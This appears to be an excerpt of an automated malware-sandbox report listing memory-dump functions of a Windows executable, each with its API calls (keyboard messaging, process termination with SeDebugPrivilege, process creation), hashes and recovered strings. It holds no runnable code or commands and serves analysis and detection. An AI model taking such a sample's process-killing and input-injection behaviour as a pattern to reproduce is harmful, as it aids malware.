                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bafed15f46f3f6b02c6f098041c4bf2e0a58087ae727ee62e87bc68eb763522e
                                                    • Instruction ID: 91dcc5aca28bec3a2440fcef6b5fdf431d98cce272a50eb5186b301bd45a4e86
                                                    • Opcode Fuzzy Hash: bafed15f46f3f6b02c6f098041c4bf2e0a58087ae727ee62e87bc68eb763522e
                                                    • Instruction Fuzzy Hash: 8321B439200210AFDB11AF10EC09B6E77A8EF49711F11807BF90ADB261DB74AC01CB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041AE57: GetWindowThreadProcessId.USER32(00000005,00000000), ref: 0041AE77
                                                      • Part of subcall function 0041AE57: GetCurrentThreadId.KERNEL32 ref: 0041AE7E
                                                      • Part of subcall function 0041AE57: AttachThreadInput.USER32(00000000,?,00419B65,?,00000001,?,?,?,?,?,00443940,00000001), ref: 0041AE85
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419B70
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00419B8D
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419B90
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419B99
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00419BB7
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419BBA
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00419BC3
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00419BDA
                                                    • Sleep.KERNEL32(00000000,?,?,?,00443940,00000001), ref: 00419BDD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: ff79d0939ccda769024aca37730c0f0b61ceb6c31b08f23d59e38aa2eaab2ea2
                                                    • Instruction ID: 86499955414786ebee73e77e255c55a595a7b0c5353282d83f3b9fd6f755e3f0
                                                    • Opcode Fuzzy Hash: ff79d0939ccda769024aca37730c0f0b61ceb6c31b08f23d59e38aa2eaab2ea2
                                                    • Instruction Fuzzy Hash: CF110875550618BEF6102B60EC49FAA3F1DEB4D799F110426F244AB0A0C9F36C51DAB8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E0C
                                                    • HeapAlloc.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E13
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E28
                                                    • GetCurrentProcess.KERNEL32(00479544,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E30
                                                    • DuplicateHandle.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E33
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E43
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E4B
                                                    • DuplicateHandle.KERNEL32(00000000,?,00418A84,00000B00,?,?,?,?,?), ref: 00418E4E
                                                    • CreateThread.KERNEL32 ref: 00418E68
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 97ee80b51115b11de5df2ab420e908640f6661632254269bb645b285dc893fb1
                                                    • Instruction ID: 94894ec6b40fc2c3a919c651c2471b2ff25e1584b69fd1ecc59c97f9283bdab2
                                                    • Opcode Fuzzy Hash: 97ee80b51115b11de5df2ab420e908640f6661632254269bb645b285dc893fb1
                                                    • Instruction Fuzzy Hash: 6C01A8BA240308FFE610ABA5DC49F6B3BACEB8A755F114421F605DA1A0CA759C048B24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$ClearInit
                                                    • String ID: ,,E$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2610073882-3165839431
                                                    • Opcode ID: 7344640d717bf16ea48d86d46a43080127d564a948a29922caf7bbe44a967a40
                                                    • Instruction ID: 71090b3c4917ca7eb042b450a79f0a816646f0946dc961677b6a08ca4920edd2
                                                    • Opcode Fuzzy Hash: 7344640d717bf16ea48d86d46a43080127d564a948a29922caf7bbe44a967a40
                                                    • Instruction Fuzzy Hash: 1F91AE71900215ABDB21DFA5DC49FAFBBB8EF49314F10811AF505AB280D7B49D45CFA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043FB5C
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043FB80
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043FBC0
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043FBE2
                                                    • CreateProcessW.KERNEL32 ref: 0043FD5E
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0043FD90
                                                    • CloseHandle.KERNEL32(?), ref: 0043FDBF
                                                    • CloseHandle.KERNEL32(?), ref: 0043FE36
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 2947177986-0
                                                    • Opcode ID: 11caf3e97a4e0a536ddb1fcecf9a364c2385a72e1178e7923f1afac4ec619338
                                                    • Instruction ID: f703b15afc6b2587d97322182f8cfedd0b0c4308b3bc8598124d2befb44119b9
                                                    • Opcode Fuzzy Hash: 11caf3e97a4e0a536ddb1fcecf9a364c2385a72e1178e7923f1afac4ec619338
                                                    • Instruction Fuzzy Hash: B1E1C0316042409FC715EF24D885B6BBBE4EF89354F14982EF4898F2A2CB35EC48CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00423E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00423EB6
                                                      • Part of subcall function 00423E91: Process32FirstW.KERNEL32(00000000,?), ref: 00423EC4
                                                      • Part of subcall function 00423E91: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00423F8E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043ECB8
                                                    • GetLastError.KERNEL32 ref: 0043ECCB
                                                    • OpenProcess.KERNEL32(00000001,00000000,?,?,SeDebugPrivilege), ref: 0043ECFA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043ED77
                                                    • GetLastError.KERNEL32(00000000), ref: 0043ED82
                                                    • CloseHandle.KERNEL32(00000000), ref: 0043EDB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 1701285019-2896544425
                                                    • Opcode ID: 944c00616f1a32bbbf529eaa5bd9c38e35a61069ff07cee256772286b901c43f
                                                    • Instruction ID: 6c14bab079c75707f6954f299ed43a476ee9d26feaa8d1426ea2cbfb960cb7af
                                                    • Opcode Fuzzy Hash: 944c00616f1a32bbbf529eaa5bd9c38e35a61069ff07cee256772286b901c43f
                                                    • Instruction Fuzzy Hash: 2041AB312002019FDB11EF25C895F6EB7A4AF45714F08802EF8469F3C2DBB8AC04CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 004232C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 91d835fe306ec04fa4ca842eb9fa3e7ba23d541c0e6f14639e9cf52c20f22163
                                                    • Instruction ID: bd4a49d420b6bcc4a1fe5a0b14bf05ef3e98574381385f99f096d0aa13b7b811
                                                    • Opcode Fuzzy Hash: 91d835fe306ec04fa4ca842eb9fa3e7ba23d541c0e6f14639e9cf52c20f22163
                                                    • Instruction Fuzzy Hash: 7D2126323093A5FAE7015E50FC42DABA7ACDF15776B21009BF0046A2C1D66E2B0145BE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 642191829-3771769585
                                                    • Opcode ID: 4d962c5b5ca8beb6a7104837c61cc5d75144bffb9762fcd5faf0b1c81e18dc7a
                                                    • Instruction ID: e61693dffff33a30c9c5ce6087385d13b44ed15976e644257705db43c9660ad8
                                                    • Opcode Fuzzy Hash: 4d962c5b5ca8beb6a7104837c61cc5d75144bffb9762fcd5faf0b1c81e18dc7a
                                                    • Instruction Fuzzy Hash: 1D210875604134AADB21EB71FD0AEDF77BCDB81721F400177F04495091EF789AC58669
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00427CF6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: d541b25ffe9e3d823eab5f28f0b740650fe5af0fe93688a506e1457056e68c3e
                                                    • Instruction ID: a6d44a9683c3cfe4b6c32c31d66501a16505427ec1a43f0145696ffc7db36222
                                                    • Opcode Fuzzy Hash: d541b25ffe9e3d823eab5f28f0b740650fe5af0fe93688a506e1457056e68c3e
                                                    • Instruction Fuzzy Hash: A2B1D471A0822A9FDB10DFA4E884BBFB7B4FF09321F61406AE500E7241D7789941CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetSystemMetrics.USER32 ref: 0044D78A
                                                    • GetSystemMetrics.USER32 ref: 0044D7AA
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0044D9E5
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0044DA03
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0044DA24
                                                    • ShowWindow.USER32(00000003,00000000), ref: 0044DA43
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0044DA68
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0044DA8B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: 074d1e455e7af51d1479f041ef3fc9469120db81b2ef715ec20bb8c979279418
                                                    • Instruction ID: a98c711bef2bce3382779e4655d0636e10efb226638ccd533ae476d700dbc201
                                                    • Opcode Fuzzy Hash: 074d1e455e7af51d1479f041ef3fc9469120db81b2ef715ec20bb8c979279418
                                                    • Instruction Fuzzy Hash: B9B19C75A00215EFEF14CF68C9C57BE7BB1FF04701F08806AEC48AA295D738A950CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003C2ACF
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003C2B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003FC46A
                                                    • ShowWindow.USER32(FFFFFFFF,?,?,00000000,?,003FC417,00000004,00000000,00000000,00000000,000000FF), ref: 003FC4D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 037d0d38554d50ad376582204ed98b53cdebbb63cc0d02ce814076cdc0b341de
                                                    • Instruction ID: a904a5e2b2101c6edd7b0f072bab89aa0da9cb368ff11f1195ce22352f82f7fa
                                                    • Opcode Fuzzy Hash: 037d0d38554d50ad376582204ed98b53cdebbb63cc0d02ce814076cdc0b341de
                                                    • Instruction Fuzzy Hash: 65414D39508684AEC73B8B3DDD9CF7B3B55AF46310F16882DE147C2960CA75AC45C724
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004241D4
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004241E0
                                                    • LockResource.KERNEL32(00000000), ref: 004241ED
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0042420D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0042421F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0042422E
                                                    • LockResource.KERNEL32(?), ref: 0042423A
                                                    • CreateIconFromResourceEx.USER32 ref: 0042429B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                                    • String ID:
                                                    • API String ID: 2263570339-0
                                                    • Opcode ID: 9e86d8ad74978670dc31799ae0be5fca43cbb38d157dd87e1002075167de16ba
                                                    • Instruction ID: 22da253c79582ee1a19b9f76c76800e257b9d9e49ba468458394bd488a4b82bb
                                                    • Opcode Fuzzy Hash: 9e86d8ad74978670dc31799ae0be5fca43cbb38d157dd87e1002075167de16ba
                                                    • Instruction Fuzzy Hash: CD31CE7560122AABCB019FA1EC48EBF7BACFF45341F4045B6F801D2150D778DA618BB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0044645A
                                                    • GetDC.USER32(00000000), ref: 00446462
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044646D
                                                    • ReleaseDC.USER32 ref: 00446479
                                                    • CreateFontW.GDI32(000000FF,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 004464B5
                                                    • SendMessageW.USER32(00000001,00000030,00000000,00000001), ref: 004464C6
                                                    • MoveWindow.USER32(00000001,?,?,?,?,00000000,?,?,00449299,?,00000002,000000FF,00000000,00000001,000000FF,?), ref: 00446500
                                                    • SendMessageW.USER32(00000001,00000142,00000000,00000000), ref: 00446520
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: cf705c3c8557756e7e40020ddcaa2a525f90188a36419592c5b29d1fa4a1d05b
                                                    • Instruction ID: 904e6a75315bb650a568c37f649c4c851f838289dc3ed93257d07603b80302f7
                                                    • Opcode Fuzzy Hash: cf705c3c8557756e7e40020ddcaa2a525f90188a36419592c5b29d1fa4a1d05b
                                                    • Instruction Fuzzy Hash: FE319C76201210BFEB208F50DC8AFEB3F6DEF4A765F054066FE089A195C6799845CB78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: c0cf5e4958c49d2e7332b3adae72302939ed35f425a64491feb1ed94d1b22aab
                                                    • Instruction ID: 1983f0de7853449990863725946a7893f2dd20b024b9408ba150058970f41c10
                                                    • Opcode Fuzzy Hash: c0cf5e4958c49d2e7332b3adae72302939ed35f425a64491feb1ed94d1b22aab
                                                    • Instruction Fuzzy Hash: 72D1C171A4020AAFDF10CFA8D885EEFB7B8FB48314F10852AF945A7280D7789D55CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e11d7613074a9d5f925d46ed18126dac40eae3a2589bf3cc002c3886abcf59c
                                                    • Instruction ID: 78942fc83b1772d375587bf9c063d3e39bde9d13f63dc8ba4fa303d310982362
                                                    • Opcode Fuzzy Hash: 0e11d7613074a9d5f925d46ed18126dac40eae3a2589bf3cc002c3886abcf59c
                                                    • Instruction Fuzzy Hash: 5D818B74900109EFCB06CF99CC49EBEBB78FF86314F118159F915AA252C734AE11DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00F784A8), ref: 0044B6A5
                                                    • IsWindowEnabled.USER32(00F784A8), ref: 0044B6B1
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0044B795
                                                    • SendMessageW.USER32(00F784A8,000000B0,?,?), ref: 0044B7CC
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0044B809
                                                    • GetWindowLongW.USER32(00F784A8,000000EC), ref: 0044B82B
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044B843
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 355fb09ae33575a824e7fc8bf8942af6f225ea96f24e05530f412ca6ec20d3b5
                                                    • Instruction ID: 6f7fd31dffa67334b5d95cdfcecc7064c146713ce217315643e3fc4da8127952
                                                    • Opcode Fuzzy Hash: 355fb09ae33575a824e7fc8bf8942af6f225ea96f24e05530f412ca6ec20d3b5
                                                    • Instruction Fuzzy Hash: BD71BF34600204AFFB20AF64C894FBA7BB9FB4A340F16446BF94597361C739E941CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 004212B5
                                                    • GetKeyboardState.USER32(?,?,?,?), ref: 004212CA
                                                    • SetKeyboardState.USER32(?,?,?,?), ref: 0042132B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00421357
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00421374
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004213B8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004213D9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 1eeb8c4f8abad87c64b0c37bdbd25c5cc7025b9221a4137c510fda040500f8c7
                                                    • Instruction ID: a8f9a4ce503ffcffd597937c3af1dcde932911c82df6b94081d2c0554a391ddd
                                                    • Opcode Fuzzy Hash: 1eeb8c4f8abad87c64b0c37bdbd25c5cc7025b9221a4137c510fda040500f8c7
                                                    • Instruction Fuzzy Hash: D35104A07043E53CFB328325AC05B777FA99B16304F48449BF1D895DE2D3A9E888D768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetParent.USER32(?), ref: 0042149C
                                                    • GetKeyboardState.USER32(?), ref: 004214B1
                                                    • SetKeyboardState.USER32(?), ref: 00421512
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00421540
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0042155F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 004215A5
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004215C8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
